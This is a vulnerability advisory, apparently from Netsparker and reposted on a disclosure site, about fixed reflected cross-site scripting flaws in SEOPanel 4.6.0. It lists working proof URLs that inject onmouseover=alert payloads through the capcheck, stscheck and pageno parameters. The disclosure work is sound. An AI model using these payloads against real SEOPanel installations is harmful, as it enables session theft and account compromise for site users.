SEOPanel 4.6.0 Cross Site Scripting

2020.12.30
Credit: Daniel Bishtawi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Hello, We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0. Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerabilities in SEOPanel Affected Software: SEOPanel Affected Versions: 4.6.0 Vendor Homepage: https://www.seopanel.org/ Vulnerability Type: Cross-Site Scripting Severity: Important Status: Fixed CVSS Score (3.0): 7.4 (High) Netsparker Advisory Reference: NS-20-005 Technical Details -------------------- SEO Panel root was at http://localhost:8080 Cross-site Scripting in Directories.php URL: http://localhost:8080/directories.php?capcheck=%27%22%20ns%3dnetsparker(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1 Parameter Name: capcheck Parameter Type: GET Attack: '" ns=netsparker(0x00E4E5) Proof URL: http://localhost:8080/directories.php?capcheck=%27%22%20onmouseover%3dalert(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1 Cross-site Scripting in seo-plugins-manager.php (5) URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x01434E)%20 Parameter Name: stscheck Parameter Type: GET Attack: '" ns=netsparker(0x01434E) Proof URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x01434E)%20 URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x00E492)%20 Parameter Name: stscheck Parameter Type: GET Attack: ''" ns=netsparker(0x00E492) Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x00E492)%20 URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x011A0C)%20&pid=1&sec=listinfo Parameter Name: pageno Parameter Type: GET Attack: ''" ns=netsparker(0x011A0C) Proof URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x011A0C)%20&pid=1&sec=listinfo URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20ns%3dnetsparker(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select Parameter Name: pageno Parameter Type: GET Attack: '" ns=netsparker(0x01B8AB) Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20onmouseover%3dalert(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x00DC5E)%20&pid=1&sec=listinfo Parameter Name: pageno Parameter Type: GET Attack: ''" ns=netsparker(0x00DC5E) Proof URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x00DC5E)%20&pid=1&sec=listinfo For more information: https://www.netsparker.com/web-applications-advisories/ns-20-005-cross-site-scripting-in-seopanel/ Regards, [image: upload image] Daniel Bishtawi | Marketing Administrator E: daniel.bishtawi@netsparker.com <daniel.bishtawi@netsparker.com>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top